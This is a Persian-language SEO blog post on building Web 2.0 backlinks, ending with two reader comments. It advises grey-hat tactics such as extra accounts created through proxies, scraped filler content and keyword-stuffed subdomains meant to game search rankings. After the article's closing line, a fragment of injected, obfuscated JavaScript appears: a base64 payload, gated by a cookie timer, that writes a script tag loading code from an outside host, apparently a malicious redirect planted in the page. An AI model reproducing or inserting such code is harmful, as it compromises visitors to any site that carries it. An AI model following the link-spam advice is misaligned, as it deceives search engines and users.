2 دیدگاه
2021/02/17
637 بازدید

بک لینک وب 2.0 : چطور در سایت های وب 2، لینک سازی خارجی کنیم؟

از آنجایی که تکنولوژی در حال گسترش و پیشرفت است، وب هم در ارائه خدمات نیز بهتر از قبل شده است و خیلی از وب سایت ها به مدل دیگری از وب نیز در حال انتقال هستند که به آن ها وب 2.0 نیز گفته می شود. شاید در ابتدا فکر کنید که وب 2، خیلی پیچیده بوده و لینک سازی در آن نیز بسیار دشوارتر از انواع دیگر بک لینک ها است؛ ویکی دمی در این مقاله قصد دارد، درباره لینک سازی وب 2 چیست و هم، چگونه می توان آن را ایجاد نمود، اطلاعاتی را در این مقاله برای شما به اشتراک بگذارد. تا انتهای مقاله همراه ما باشید.

منظور از سایت های وب2 (web2.0) چیست؟

وب 2.0، اصطلاحی است که طیف گسترده ای از جنبه های تعاملی و مشترک اینترنت را توصیف می کند. این اصطلاح، در سال 2004-2005 ظاهر شد که به  “وب اجتماعی” نامگذاری شد. اساساً، این نسل دوم از صفحات وب که در حال توسعه بوده است، باعث آسان تر شدن ارتباطات و کارها شده است؛ به طوریکه، خدمات و اطلاعات ایمنی را ارائه داده و همکاری در اینترنت را تضمین کرده است. تیم مخترع و مروج این اصطلاح تیم O’Reilly است.

وب 2.0،  در راستای وب 1.0 ، اختراع و روی کار آمده است که  نمایانگر نسل اول وب می باشد.. پس از آن، همه وب سایت هایی که با زبان (HTML + CSS) ساخته می شده اند را web 2 میگفته اند اما در حال حاضر، به دلیل محدودیتهای فراوان، سایت هایی که روی CMS (سیستم مدیریت محتوا)، انجمنها، وبلاگها و غیره ساخته شده اند نیز جز وب 2 به حساب می آیند و بک لینک سازی در این وب 2 ها نیز بسیار راحت و آسان می باشد.

در حالت کلی، وب  2 ، یک بستر رایگان برای لینک سازی و ساخت بلاگ بوده که به کاربران اجازه می دهد، به راحتی آدرس صفحات، عکس و ویدئو و مطالبی را که مد نظرشان است را در این سایت ها قرار دهند. در واقع سایت های وب 2، یک زیرمجموعه ای از سایت های اصلی مانند بلاگر بوده اند که فقط فضایی را برای دسترسی بهتر کاربران ایجاد کرده اند.

نمونه ای از سایت های وب 2:

Blogger | blog.ir | blogfa | wix | medium ..

چطور امکان دارد که یک web 2.0 به یک بک لینک بزرگ و مهم تبدیل  شود؟

همانطور که در بالا گفته شد، وب 2، یک زیر دامنه بوده که به علت اعتمادی که به دامنه اصلی داشته ایم، یک سایت مجزا را در آن دامنه ایجاد کرده ایم. سایت هایی که به عنوان زیر دامنه ایجاد می شوند، دارای authority و PA بهتری نسبت به دیگر سایت هایی هستند که بخواهیم از صفر، شروع به ایجاد آن نماییم. هر دامنه ای می تواند به زیر دامنه خود PA و DA متفاوتی را ارائه دهد که مقدار آن از صفر تا 30 متغیر است. نکته ای که نباید در بک لینک حرفه ای وب 2، فراموش شود، این است که این سایت ها به ما لینک های مرتبط با حوزه کاری را ارائه می دهند که دارای ارزش بسیاری می باشد.

در اینجا سوالی مطرح می شود مبنی بر اینکه، چگونه می توانیم یک وب 2 با کیفیت بسازیم؟

بک لینک وب 2نحوه ساخت بک لینک وب 2 با 9 مرحله حیاتی

برای اینکه به ساخت بک لینک در وب 2 بپردازیم، باید با 9 مرحله آشنا شوید که در ادامه به معرفی آن ها می پردازیم:

1- آماده کار شوید

از آنجا که اکثر برنامه های خودکار نمی توانند در بهترین وب 2.0 ها پست بگذارند، شما باید این کار را به صورت دستی انجام دهید. باید به یاد داشته باشید که اولین لایه بک لینک باید از کیفیت بالایی برخوردار باشد در غیر این صورت به عنوان لینک های اسپم و مخرب شناخته می شوید.

گوگل برای اینکه رتبه شما را افزایش دهد نیاز دارد که لینک هایی از جنس اعتبار، مرتبط و قابل اعتمادی را  ایجاد نمایید. اگر بتوانید به هر سه هدف گوگل نائل آیید، می توانید اولین مرحله را پشت سر بگذارید.

-2 یک آدرس ایمیل ایجاد کنید

شما باید برای این وب 2.0 ها حساب کاربری ایجاد کنید، بنابراین توصیه میکنیم برای این منظور، یک ایمیل پیش فرض تهیه کنید. مهم نیست که برای ایجاد ویژگی ها از همان حساب ایمیل استفاده می کنید یا از ایمیل دیگر.

3- برای 10 (یا یک میلیون) وب 2.0 ثبت نام کنید

دلیل خاصی وجود ندارد که چرا “10” را انتخاب کردیم ، اما تعداد خوبی برای شروع است. بسته به رقابت کلمات کلیدی خود، ممکن است نیاز به تولید بیشتر داشته باشید.اگر هم تعداد وب 2 ها کم است می توانید از طریق پروکسی، تعدادی را در همان دامنه ها با اکانت دیگر ایجاد کنید، اما در ساخت اکانت زیاده روی نکنید که عمل عکس را برای شما دارد.

4- ایجاد URL

اکنون که حساب های خود را ایجاد کرده اید، از شما خواسته می شود تا URL مانند این را ایجاد کنید:

“keywordkeyword.blogspot.com”.

اگر سایت اصلی شما مربوط به “خرید بک لینک حرفه ای” است، URL های شما باید حاوی یک کلمه کلیدی خاص باشد که سعی در رتبه بندی یا کلمات LSI مرتبط دارید.

  هفت ویژگی مهم گوگل آنالیتیکس که باعث افزایش عملکرد می شود.

در اینجا نحوه ظاهر برخی از URL های وب 2.0 شما آورده شده است:

Buyingbacklinkspro.wordpress.com

backlinksblogger.blogspot.com

outboundlinks.weebly.com

Externallink.jimdo.com

آیا می بینید که این URL ها چگونه طبیعی به نظر می رسند؟ اگر هر وب 2.0 که ایجاد می کنید “خرید بک لینک” را در URL داشته باشد ، ممکن است، به عنوان اسپم شناخته شوید. برای ساخت آدرس هر web 2.0 فقط از کلمه کلیدی استفاده نکنید و از lsi آن کلمه یا حتی آدرسی که نامرتبط هم است، می توانید استفاده نمایید.

آدرس های اینترنتی5- راه های ایجاد محتوا

محتوایی که در وب 2.0 خود قرار می دهید مهمترین قسمت این فرایند است! چند روش مختلف وجود دارد که می توانید به ایجاد محتوا نزدیک شوید؛ اما، تصمیم گیری در مورد استفاده از تکنیک، به منابع و زمان شما بستگی دارد.

https://wikidemy.ir/what-is-off-page-seo/

1. خودتان آن را بنویسید (بهترین روش)

نوشتن محتوای منحصر به فرد برای تمام وب 2.0 ها، بهترین کار مطلق است. اگر توانایی مالی دارید، باید به فکر برون سپاری آن باشید. اگر بودجه شما اندک است، پس فقط خودتان آن را بنویسید یا گزینه زیر را در نظر بگیرید.

2. بازنویسی پیشرفته

اگر بودجه شما محدود است و شما نیاز به تولید محتوای زیادی دارید، شاید بخواهید بعضی از مقالات دیگر را بازنویسی و یا ترجمه کنید.

ما می خواهیم با شما صادق باشیم ، ما هرگز از محتوای بازنویسی شده یا ترجمه شده در سطح یک استفاده نمی کنیم. ما همیشه از مطالب منحصر به فرد استفاده می کنیم. این به این معنی نیست که محتوای بازنویسی شده، کار نمی کند.اگر تصمیم دارید  که محتوایی را بازنویسی کنید، نباید محتوا را طوری بنویسید که در کمتر از ده دقیقه کار شما تمام شود، بلکه محتوای بازنویسی شده عالی، حداقل به 2-4 ساعت زمان نیاز دارد.

3. خراش دادن محتوا (توصیه نمی شود)

خراشیدن محتوا برای ردیف دو یا سه شما مشکلی ندارد، اما ما قطعاً توصیه نمی کنیم که برای ردیف اول از آن استفاده کنید. نمی گوییم جواب نمی دهد، اگر می خواهید یک وب سایت معتبر طولانی مدت ایجاد کنید، این فقط یک اقدام پرخطر است.

6- دستورالعمل های محتوا

مهم نیست که  محتوای شما از چه نوعی تولید شده است، بلکه باید زیر 400 کلمه نباشد که البته در حال حاضر، زیر 800 کلمه توصیه نمی شود. سعی کنید علاوه بر کلمه کلیدی مقاله، از lsi آن کلمه کلیدی هم استفاده نمایید تا مقاله شما به روز تر و بهتر دیده شود. گفته شده است که تراکم کلمات کلیدی در حدود 1-3% باشد که ما توصیه می کنیم، که بدون در نظر گرفتن تراکم کلمات کلیدی، مقاله خود را فقط برای کاربران بنویسید؛ چرا که آپدیت های جدید گوگل فقط به خوانایی و کاربر پسند بودن محتواها توجه زیادی دارند.

7- راه اندازی پست

مقاله خود را برای ویرایشگر وب 2.0 که انتخاب می کنید، داخل آن ویرایش کنید. در این مرحله ، شما باید عکس و فیلم را برای پست خود جمع کنید.

بعد از وارد کردن عکس ها و فیلم ها ، وقت آن است که پیوندهای خود را وارد کنید. یک پیوند، مربوط به صفحه مورد نظر شما خواهد بود و لینک دیگر، مربوط به یک وب سایت مربوطه یا دارای مرجع خواهد بود. لینک های وب 2 را به صورت تصادفی ایجاد نمایید و تا جایی که امکان دارد، لینکها نیز مرتبط باشند، اما اگر مرتبط هم نبودند، نگران نباشید. حال قبل از انتشار باید از محتوای پر کننده استفاده نمایید.

8- محتوای پرکننده

فکر می کنید فقط می توانید مقاله خود را ارسال کنید و خوب باشید؟ خوب … شما واقعاً می توانید، اما این قطعاً توصیه نمی شود. شما می خواهید این پیوندها دائمی باشند. مهمتر از همه، شما نمی خواهید آنها حذف شوند.

وبی که دارای تک نسخه یا تک مقاله ای است، به احتمال زیاد، پاک می شود.

یادتان باشد:

اگر وب 2 که ایجاد کردید دارای محتوای با کیفیت باشد، یا حتی از اشتراک محتوا در سایت خود استفاده کرده باشید، گوگل ارزش و اهمیت بیشتری به سایت شما می دهد و همین امر در رتبه گرفتن صفحات شما نیز موثر است. منظور از محتواهای پر کننده می تواند همان محتواهای خراشیده یا اشتراک مطلب یا محتواهای بازنویسی شده باشد. این محتواها خیلی بهتراز این است که سایت شما تک نسخه ای باشد.

9- با برنامه ریزی، پست خود را منتشر کنید.

برخی از وب 2.0 ها، به شما  این امکان را می دهند که پست ها را برنامه ریزی کنید و برخی دیگر، اجازه این کار را نمی دهند.

ما توصیه می کنیم که  پست های خود را در فواصل روزانه تنظیم کنید. از همه وب 2.0 خود، برای ارسال پست در یک روز استفاده نکنید وسعی کنید در ارسال فرکانس به سمت گوگل، تعادل و طبیعی بودن را رعایت نمایید.

توصیه ما به شما این است که در ابتدا، از محتواهای پرکننده در وب 2.0 خود استفاده کنید. سپس با مقاله ای که می خواهید پیوند خود را در آن قرار دهید، آن را دنبال کنید. بهتر است که مقاله اصلی خود را در وب 2 قرار ندهید و بعد از ارسال 5 مقاله، سپس اقدام به اشتراک مقاله خود نمایید.

  خطا: کلید واژه تمرکزی در اولین پاراگراف رونوشت ظاهر نمی شود

چطور یک بک لینک web 2 عالی بسازیم ؟(How to create super web 2.0)

زمانی از واژه super برای بک لینک سازی استفاده می کنیم که بیش از یک صفحه بک لینک ساخته باشیم. به نظر شما این روش امن و درست است؟ ایجاد وب 2.0 که تنها با هدف قرار دادن بک لینک در سایتی ایجاد می شود یک تاکتیک کلاه خاکستری است. این بدان معناست که استفاده از این تاکتیک، ممکن است خطراتی را هم به دنبال داشته باشد. با این اوصاف ، اگر بک لینک های با کیفیت دیگری را مخلوط کنید، خطر خود را کاهش  داده اید. 

نحوه ساخت بک لینک Super Web 2.0

بگذارید ابتدا با گفتن این که این یک روند خسته کننده است شروع کنم. اما ، اگر می خواهید ریسک را کاهش دهید، در این صورت نباید از نظر میزان کار مشکلی داشته باشید. به این روند فکر کنید که گویی در حال ایجاد یک وب سایت واقعی هستید. روزهای بازی شما با وب 2.0 های تک صفحه ای به پایان رسیده است. بیایید شروع کنیم:

مرحله 1:  در 5-10  Web 2.0  مختلف، ثبت نام کنید

در ابتدای ثبت نام، ایمیل تاییدیه از آن سایت برای شما ارسال می شود که در صورت تایید نکردن آن، امکان پاک شدن پروفایلی که ایجاد کرده اید، وجود دارد و حتی اگر پاک هم نشود، شما نمی توانید در ان سایت فعالیتی را انجام دهید.

مرحله 2: ایجاد وبلاگ (ها)

در اینجا چند مرحله وجود دارد که من  به این طریق، این وب 2 ها را  ایجاد می کنم:

کلمه کلیدی مورد نظر خود را در URL قرار دهید: برخی از افراد با انجام این کار دست و پنجه نرم می کنند. اما نیازی به این نیست زیرا تفاوتی با ایجاد یک دامنه مطابقت دقیق ندارد. برای طبیعی تر کردن این ویژگی ، اضافه کردن کلمات اضافی مانند “keywordexperts.wordpress.com” یا “mrtargetkeyword.blogger.com” را در نظر بگیرید. اما اگر زیر دامنه مطابقت دقیق موجود است ، باید آن را انتخاب کنید.

مثال: “targetkeyword.jigsy.com”.

عنوان و توضیحات سایت را تغییر دهید: عنوان به طور واضح باید هر نامی باشد که وب سایت خود را نامگذاری کرده اید و باید شامل کلمه کلیدی هدف شما باشد. با هر کلمه کلیدی که به طور طبیعی در آن قرار داده شده است ، یک توصیف منحصر به فرد برای هر وبلاگ ایجاد کنید. من ممکن است چیزی مانند “ما منبع شما برای کلمه کلیدی هدف هستیم” ، “به دنبال کلمه کلیدی هدف در هیچ جای دیگر نباشید ، زیرا ما شما را تحت پوشش قرار داده ایم” و غیره را در عنوان و توضیحات بنویسم.

وبلاگ چیستمرحله 3: ایجاد صفحات About و Contact

ایجاد این دو صفحه فوراً وبلاگ شما را بسیار قانونی تر می کند. برای صفحه “درباره ما” ، به سادگی چند جمله یا یک پاراگراف درباره این وبلاگ یا کلمه کلیدی خود بنویسید. با توجه به اینکه در زمینه کاری خود متخصص هستید، این کار باید آسان باشد. اگر یک آژانس جستجوگر سئو هستید ، اطلاعات کلی تری درباره صفحه ایجاد کنید.باید این صفحات را طوری ایجاد کنید که انگار یک سایت واقعی را ایجاد کرده اید و درباره خود و تجارتتان، فوق العاده بنویسید.

از صفحه About ، باید بعضی اوقات به صفحه اصلی خود لینک دهید، زیرا این همان کاری است که اکثر افراد در وبلاگ های واقعی انجام می دهند. اکنون ، یک صفحه “مخاطب” ایجاد کنید و یک جمله ساده مانند “اگر در مورد کلمه کلیدی اصلی سوال دیگری دارید، امروز با ما تماس بگیرید” بنویسید. 

مرحله 4: ایجاد پست “Welcome”

اولین پست وبلاگ شما در وب 2.0 باید یک پست “خوش آمدید” باشد. البته روی جملات آن زیاد فکر نکنید و فقط یک پاراگراف یا چند جمله در مورد وبلاگ تازه ایجاد شده خود بنویسید.

 مرحله 5: وبلاگ را با محتوای مربوطه پر کنید (محتوای پرکننده)

در این مرحله ، شما قصد دارید وب 2.0 خود را به یک منبع فوق العاده مرتبط تبدیل کنید که Google و هر کسی که به آن برخورد کند قدردان آن خواهد بود. محتوای “Filler” محتوای مربوطه است که شما به غیر از مقاله ، لینک وب 2.0 را برای وب خود ارسال می کنید که میزبان پیوند به سایت شما خواهد بود. تصمیم گیری درباره میزان محتوای پرکننده کاملاً به خود شما بستگی دارد. من به طور معمول از هر 3-8 پست مربوطه استفاده خواهم کرد تا از ایجاد هرگونه یکنواختی جلوگیری کنم.

فیلم ها: به سادگی به YouTube بروید و فیلم هایی را در صنعت خود جستجو کنید. ویدیو را در یک پست قرار دهید و یک عنوان مناسب بنویسید و رونق بگیرید ، شما یک پست وبلاگ جدید دارید.

تصاویر: این در بسیاری از نقاط کار می کند ، اما برخی از آنها ممکن است نباشد. کافی است به Google بروید و تصاویر مربوط به صنعت خود را جستجو کنید. 3-5  تصویر عالی پیدا کنید و یک پست وبلاگ در مورد آنها ایجاد کنید. یک یا دو جمله بنویسید و توضیح دهید که چرا آنها مربوط به صنعت شما هستند.

نقل قول ها: در صورت امکان، نقل قول ها یک شکل عالی از محتوای پرکننده هستند. بسیاری از جایگاه ها قادر به استفاده از این روش نیستند؛ اما اگر شما می توانید، از آن نهایت استفاده را ببرید. کلمه کلیدی + نقل قول های خود را در Google جستجو کنید. نقل قول را کپی کرده و یک پست فوق العاده مختصر وبلاگ در مورد آن بنویسید.

* اینفوگرافیک ها: اینفوگرافیک ها در صورت موجود بودن در جایگاه خاص شما ، محتوای پر کننده عالی هستند.

نوشتن محتوای واقعی: اگر وقت زیادی روی دست خود دارید یا فقط روی یک وب سایت کار می کنید ، این بهترین مسیر برای انتخاب است. شما می توانید در مورد موضوعات مرتبط بنویسید.این یک روش بسیار سخت بوده، اما کار می کند و می تواند به شما در تسریع روند محتوای پرکننده کمک کند.

* من اکیداً توصیه می کنم این پست ها را در طول ماه (ها) تنظیم کنید. به این ترتیب محتوای تازه ای در وب 2.0 منتشر می شود که این امر حتی طبیعی تر است. هر ماه یک پست جدید در ویژگی های وب 2.0 شما وجود دارد. اگر مدت زمان ارسال پست های خود را برای 6 ماه آینده یا همین حدود نشان دهید ، Google وب 2.0 شما را دوست خواهد داشت و هرگز نگران پاک شدن آن یا موارد دیگر نخواهید بود.

مرحله 6: مقاله Seed خود را ارسال یا برنامه ریزی کنید

  Dwell time چیست و آیا مدت زمان حضور کاربر در سایت تاثیری در سئو دارد؟

بسیار خوب ، بنابراین شما محتوای پرکننده ای ارسال و برنامه ریزی کرده اید ، صفحه خوبی در مورد و صفحه تماس دارید و یک پست خوش آمد گویی ایجاد کرده اید. اکنون آماده ارسال مقاله واقعی خود هستید که پیوند شما را میزبانی می کند.

نکات مهم و کلیدی درباره web 2:

 • حداقل 400 کلمه محتوا بنویسید یا بارگذاری کنید (اگر بیشتر شد، بهتر است)
 • 100٪ منحصر به فرد باشد، مگر اینکه بفهمید چگونه یک مقاله را به درستی میتوانید تغییر دهید. بنابراین توصیه می کنم 100٪ محتوای منحصر به فرد بنویسید.
 • مرتبط بودن: این مقاله باید 100٪ با کلمه کلیدی هدف شما مرتبط باشد. اگر کلمه کلیدی مورد نظر شما تحلیل و بررسی یک سایت است است، باید در مورد آنالیز و بررسی سئو سایت باشد و نه یک مقاله کلی درباره سایت.
 • تراکم کلمات کلیدی : تراکم KW شما باید در مقاله و در مهمترین مکانها در حدود 1-3٪ باشد: عنوان ، جمله اول و جمله آخر.

1-2 تصویر برای پست وبلاگ جمع کنید (از Google استفاده کنید)

این یک ترفند است: وقتی تصویر را در دسکتاپ خود ذخیره می کنید، آن را به عنوان کلمه کلیدی خود ذخیره کنید. به مثال آنالیز و بررسی سئو سایت برمی گردم ، من تصویر را با عنوان” آنالیز و بررسی سئو سایت “ذخیره می کنم . بنابراین وقتی تصویر را در وب 2.0 بارگذاری می کنم ، کلمه کلیدی آن در مسیر URL باشد. این کار را فقط برای اولین تصویری که در مقاله استفاده می کنید انجام دهید و فراموش نکنید که کلمه کلیدی اصلی خود را در برچسب ALT قرار دهید. اگر تصمیم دارید از تصویر دوم استفاده کنید، توصیه می کنم از تغییرات کلمات کلیدی برای مسیر URL و برچسب ALT استفاده کنید.

در شبکه های مختلف مانند آپارات و یوتیوب، به دنبال فیلم مربوط به کلمه کلیدی خود باشید. وب 2 خود را فقط با چند مقاله پر نکنید و از محتواهای پر کننده نیز استفاده نمایید

لینک سازی داخلی در وب 2 ایجاد کنید

ترتیب انجام این کار مهم نیست ، فقط کافی است آنها را در جایی از مقاله بعد از پیوند اصلی قرار دهید. من به طور کلی از مقاله به صفحه اصلی پیوند می دهم.

انکرتکست

تصمیم گیری برای استفاده از نوع انکرتکست در این وب 2.0 به شما بستگی دارد. من به طور کلی سعی می کنم 10 ویژگی از این ویژگی ها را ایجاد کنم تا بتوانم متن لنگر را به طور مناسب ایجاد کنم. به یاد داشته باشید ، Google می تواند ارتباط یک پیوند را بدون نیاز به یک لنگر مطابقت دقیق درک کند. تا زمانی که مقاله شما فوق العاده مرتبط باشد و مراحل فوق را دنبال کرده باشید، Google بدون نیاز به انفجار دقیق لنگرهای مطابقت ، موضوع مرتبط بودن را تشخیص داده و به شما پاداش می دهد.

نمونه وب 2 های ایرانی و خارجی

 

 

دامنه های خارجی

دامنه های ایرانی

WordPress.com

blogfa.com

Tumblr.com

blog.ir

Blogger.com

loxblog.com

Jimdo.com

parsiblog.com

Livejournal.com

persianblog.ir

Wix.com

Farsiblog.com

Weebly.com

Medad.io

Blogspot.com

Virgool.io

Zoho.com

Rozblog.com

Sites.google.com

Camva.ir

Medium.com

Portal.ir

Xing.com

Webi.ir

Evernote.com

see5.net

Slashdot.org

Rayo.ir

Hubpages.com

utabweb.net

 

امیدوارم این مقاله بتواند به شما در ساخت یک بک لینک در وب 2 کمکی کرده باشد، اگر تجربه ساخت در وب 2 های ایرانی و خارجی دارید، خوشحال می شویم که آن ها را برای ما کامنت کنید.

{var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*
*

شانزده − دو =

2

 1. sara

  سایت خیلی خوبی دارید
  امیدوارم موفق باشید

  02 آگوست 2021 پاسخ
  • imangh

   سپاس فراوان از شما

   09 آگوست 2021 پاسخ